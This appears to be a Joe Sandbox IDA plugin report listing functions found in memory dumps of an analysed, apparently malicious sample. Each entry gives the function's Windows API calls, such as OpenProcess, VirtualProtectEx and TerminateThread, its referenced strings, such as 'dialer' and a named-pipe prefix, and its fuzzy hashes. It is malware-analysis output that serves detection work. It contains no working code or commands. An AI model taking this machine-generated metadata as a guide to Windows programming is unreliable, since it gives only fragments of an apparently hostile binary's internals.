Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction ID: 2d848e6f064192455634dcb2dee55ab8152321c340e221ce2a8b97e563a5850a
Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction Fuzzy Hash: 6B115E32719B4386E750AF56E8443AA76A1F788FF4F084234EA5A877A4CB78C4268740

Function 00007FF72728707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7272870AD
GetLastError.KERNEL32 ref: 00007FF7272870B9
CloseHandle.KERNEL32 ref: 00007FF7272870D1
CreateFileW.KERNEL32 ref: 00007FF7272870FC
WriteConsoleW.KERNEL32 ref: 00007FF72728711B

Strings

CONOUT$, xrefs: 00007FF7272870DD

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction ID: b8eb21747bf4a755dd220e7e6365e7dc541b952130d6655ef11366b96993c538
Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction Fuzzy Hash: AF118131A18A4286E750AB42EE44329B2F1FB89FE4F941234EA5D877A4DF3DD505CB60

Function 000001F91B322F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F91B322F27
HeapAlloc.KERNEL32 ref: 000001F91B322F3A
StrCmpNIW.SHLWAPI ref: 000001F91B322FAF
GetProcessHeap.KERNEL32 ref: 000001F91B323015
HeapFree.KERNEL32 ref: 000001F91B323023

Strings

dialer, xrefs: 000001F91B322FA8

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction ID: aa744ba7f13bf3c70bdfc4af3e3b740cce422d50858a027e7928d69d6cb2d4de
Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction Fuzzy Hash: 44315E3670AB5796EA15EF16A9407BA67A2FB44BE4F0C8030AE4947B65EF34C4768700

Function 000001F91B32CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001F91B32CFAF
FlsSetValue.KERNEL32(?,?,?,000001F91B32D6B5,?,?,?,?,000001F91B32D778), ref: 000001F91B32CFE5
FlsSetValue.KERNEL32(?,?,?,000001F91B32D6B5,?,?,?,?,000001F91B32D778), ref: 000001F91B32D012
FlsSetValue.KERNEL32(?,?,?,000001F91B32D6B5,?,?,?,?,000001F91B32D778), ref: 000001F91B32D023
FlsSetValue.KERNEL32(?,?,?,000001F91B32D6B5,?,?,?,?,000001F91B32D778), ref: 000001F91B32D034
SetLastError.KERNEL32 ref: 000001F91B32D04F

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction ID: 95d161a0a226ab3465b2de8bb2b3e48ce18acd73a86bb32685aab534e17c9181
Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction Fuzzy Hash: 3B11603030F64742FA69BF6656593FD6253AB847F0F5C4774A836476E6DE3884238700

Function 000001F91B32199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001F91B3219C2
K32GetModuleFileNameExW.KERNEL32 ref: 000001F91B3219E0
PathFindFileNameW.SHLWAPI ref: 000001F91B3219EF
lstrlenW.KERNEL32 ref: 000001F91B3219FB
StrCpyW.SHLWAPI ref: 000001F91B321A0E
CloseHandle.KERNEL32 ref: 000001F91B321A1C

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction ID: e7c6c3ab6c815515343c82577837c46998badc912f1ac584b8c18757c0a0eb84
Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction Fuzzy Hash: 79015B31709A4386EA50EF52E4583AA63A2FB88FD0F484035EE4943764DE3CC59AC700

Function 000001F91B3236C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001F91B3236E4
GetCurrentProcess.KERNEL32 ref: 000001F91B3236F2
VirtualProtectEx.KERNEL32 ref: 000001F91B323714
GetCurrentProcess.KERNEL32 ref: 000001F91B323732
VirtualProtectEx.KERNEL32 ref: 000001F91B323753
TerminateThread.KERNEL32 ref: 000001F91B323762

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction ID: e5e2402d40cf7af65b99b5e34c510fb78bd683f5da0b60b4085048891d2d202e
Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction Fuzzy Hash: 4D011E7571EB438AEF24AF16E8493BA72B2BB45BA5F080435DD4907764EF3DC52A8700

Function 000001F91B328FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F91B329013
_IsNonwritableInCurrentImage.LIBCMT ref: 000001F91B3290A8
RtlUnwindEx.NTDLL ref: 000001F91B3290F7

Strings

f, xrefs: 000001F91B329026
csm, xrefs: 000001F91B32908E

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction ID: 8c255b465b2c64a03163d35d1154c20cc4f7a27cba128eec7142bda6d70ad591
Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
Instruction Fuzzy Hash: 8B518E3270A6038AEB14EF16E848BBD3797F344BE8F1986B4DA0647748DB35E852C700

Function 00007FF727262760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7272686B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF727263FA4,00000000,00007FF727261925), ref: 00007FF7272686E9

MessageBoxW.USER32 ref: 00007FF72726283B
MessageBoxA.USER32 ref: 00007FF72726284F

Strings

Error, xrefs: 00007FF72726282C
%s%s: %s, xrefs: 00007FF7272627EC
Error/warning (ANSI fallback), xrefs: 00007FF727262843

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
API String ID: 1878133881-640379615
Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
Instruction ID: f6c268ae09e24cd283422c7ecb8fe12fb597e119e692265c077d680478b28a55
Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
Instruction Fuzzy Hash: F32176726187C581E620AB10FA517EAA3F4FF85784F80413AE68C57A59DF3CD646CF60

Function 000001F91B323044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000001F91B323066
StrCpyW.SHLWAPI ref: 000001F91B323076
StrCatW.SHLWAPI ref: 000001F91B323082
PathCombineW.SHLWAPI ref: 000001F91B323090

Strings

\\.\pipe\, xrefs: 000001F91B32305C

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction ID: 4b5ff11c48e12a78e86123c4f17776ea36a652d8bd5e82ba358a163c81dbfeac
Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction Fuzzy Hash: 16F0FE7471DB8786EA14AF52B9542AA6662EB48FF0F0C9131EE4647B38DF3CC466D700

Function 000001F91B32BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001F91B32BCBD
GetProcAddress.KERNEL32 ref: 000001F91B32BCD3
FreeLibrary.KERNEL32 ref: 000001F91B32BCFA

Strings

mscoree.dll, xrefs: 000001F91B32BCB4
CorExitProcess, xrefs: 000001F91B32BCCC

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction ID: 25d7feeb5665242a175e39a43034526ae1dc950dc40ee34a9559157bb75baef1
Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction Fuzzy Hash: FDF09C7131E70781EB146F24E4553FA5362E7847B1F580235D96A852F4DF3CC06AD300

Function 000001F91B325710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F91B325726

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
Instruction ID: b5b537f04e9aa2fb915d9d297cecd255020d35fb05f9f1728d80977ea900c108
Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
Instruction Fuzzy Hash: 3161EC3661EB42C6EB609F16E44036E77A2F3887A4F150175EA8E47BA8DB7CC565CF00

Function 000001F91B303504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001F91B30352C
_set_statfp.LIBCMT ref: 000001F91B303547
_set_statfp.LIBCMT ref: 000001F91B303563
_set_statfp.LIBCMT ref: 000001F91B30359F

Memory Dump Source

Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: 32c750a559f32d3c376219a9bc894862f060dd399eaaedac7020dfa3e449292a
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 0311A372A5EE1712FB647E28E4D13FF1193AF5C374F4C8638A966562F6CA24C8634100

Function 000001F91B334104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001F91B33412C
_set_statfp.LIBCMT ref: 000001F91B334147
_set_statfp.LIBCMT ref: 000001F91B334163
_set_statfp.LIBCMT ref: 000001F91B33419F

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: 758946b581cfb610046c5730e558816381b5f2090ecff8bd25169f1016d08216
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 3A11513BF1AE5311F6643F68D5573F715436B683B8F1C0634A9760A6F69A28C8634200

Function 000001F91B363504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001F91B36352C
_set_statfp.LIBCMT ref: 000001F91B363547
_set_statfp.LIBCMT ref: 000001F91B363563
_set_statfp.LIBCMT ref: 000001F91B36359F

Memory Dump Source

Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: 12a6baa78aad9577992bfa13076a7e6bf2ef0424fa3093ee8d3a6198f409df43
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: D8119172A5EA1711FB6C3D2CE4C53F91193AF59374FDC8639AB66072E6DA24CA634100

Function 00007FF727288678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7272886A0
_set_statfp.LIBCMT ref: 00007FF7272886BB
_set_statfp.LIBCMT ref: 00007FF7272886D7
_set_statfp.LIBCMT ref: 00007FF727288713

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 1a8ea8704c61a72e6a1cb681a0801a326eeceaecb094648298945a42f7f85402
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 9B11D026E38A5241F2943124DE5733481F0EF56364F940639EA2EC66DACF2EA8834930

Function 00007FF72727A6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7272798B3,?,?,00000000,00007FF727279B4E,?,?,?,?,?,00007FF727279ADA), ref: 00007FF72727A6BF
FlsSetValue.KERNEL32(?,?,?,00007FF7272798B3,?,?,00000000,00007FF727279B4E,?,?,?,?,?,00007FF727279ADA), ref: 00007FF72727A6DE
FlsSetValue.KERNEL32(?,?,?,00007FF7272798B3,?,?,00000000,00007FF727279B4E,?,?,?,?,?,00007FF727279ADA), ref: 00007FF72727A706
FlsSetValue.KERNEL32(?,?,?,00007FF7272798B3,?,?,00000000,00007FF727279B4E,?,?,?,?,?,00007FF727279ADA), ref: 00007FF72727A717
FlsSetValue.KERNEL32(?,?,?,00007FF7272798B3,?,?,00000000,00007FF727279B4E,?,?,?,?,?,00007FF727279ADA), ref: 00007FF72727A728

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
Instruction ID: ba12fc5d10505b3e22b171ca7aad4d6fed65fcd17314cdadef37ca1d048e20de
Opcode Fuzzy Hash: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
Instruction Fuzzy Hash: 77112E21E0824242FA5873295F8217DA2F1DF9A7B0E984334D83D0E6D6DF2CA9434E25

Function 00007FF72727A534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF72727A545
FlsSetValue.KERNEL32 ref: 00007FF72727A564
FlsSetValue.KERNEL32 ref: 00007FF72727A58C
FlsSetValue.KERNEL32 ref: 00007FF72727A59D
FlsSetValue.KERNEL32 ref: 00007FF72727A5AE

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
Instruction ID: a2e7ccff2e4b370a725569773907e20bb0ab34d0dab1d6fd8d3834f41ae071f0
Opcode Fuzzy Hash: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
Instruction Fuzzy Hash: 3111B620E0920782FA5972295F92179A2F1CF4B770ED85638D93E1E2D2EF2CB4434E35

Function 00007FF72727EED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72727F1B7

Part of subcall function 00007FF727276D4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF727276D69

Strings

ccs, xrefs: 00007FF72727F0F2
UTF-16LEUNICODE, xrefs: 00007FF72727F155
UTF-8, xrefs: 00007FF72727F136

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction ID: c7e3c1ff46fe46ea0efb5bf7cc408a904bb9b0e69e81ef370a6a4140b4d5e45b
Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction Fuzzy Hash: F3818F72E0C24385FB64EE25CB50278A6F0EB13B44FD59035DA099F799DB2DE9039E21

Function 000001F91B2FF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001F91B2FF124

Strings

or copy constructor iterator', xrefs: 000001F91B2FF25A, 000001F91B2FF275
Wednesday, xrefs: 000001F91B2FF1ED
Tuesday, xrefs: 000001F91B2FF0F4

Memory Dump Source

Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: a8adf3255655d7fb91a95ba336ab5d8c89968562ac46bac1ecf9f4b511b447c8
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: 6C61C37660E24342FA65BF28D544BFE66A3E7657A0F5C4D3DCB06137A8DB34C84E8280

Function 000001F91B35F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001F91B35F124

Strings

or copy constructor iterator', xrefs: 000001F91B35F25A, 000001F91B35F275
Tuesday, xrefs: 000001F91B35F0F4
Wednesday, xrefs: 000001F91B35F1ED

Memory Dump Source

Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: e97729d13525f606fa96e4258f5a9e47e4e1d8b83d9041e95ec47db90d14db36
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: 2161F37660F24B42FA69BF29E5403FA6AA3E7857B0F5C4535CA0A037E4DB34C9638310

Function 000001F91B32AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001F91B32AA68
_CallSETranslator.LIBVCRUNTIME ref: 000001F91B32AAB7

Strings

RCC, xrefs: 000001F91B32AA85
MOC, xrefs: 000001F91B32AA7C

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 375434325b18fcd9a5006d35602e71b5107b281022111b0c7d000fe9cf987591
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: FE615C3660AB468AEB10EF65D4403ED77A2F744BE8F084275EF4917B98DB38D566C700

Function 000001F91B2FA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F91B2FA1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001F91B2FA288

Strings

csm, xrefs: 000001F91B2FA1C2
csm, xrefs: 000001F91B2FA2DA

Memory Dump Source

Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 2901731189757e1daf3d9c1a05424ef0099e64a20c5c7691877b09697229b297
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 66518036208283CAFB64AF1595443B977B2F366BA4F1C4A39DB4987BD5CB38D458C701

Function 000001F91B32AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F91B32ADA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001F91B32AE88

Strings

csm, xrefs: 000001F91B32AEDA
csm, xrefs: 000001F91B32ADC2

Memory Dump Source

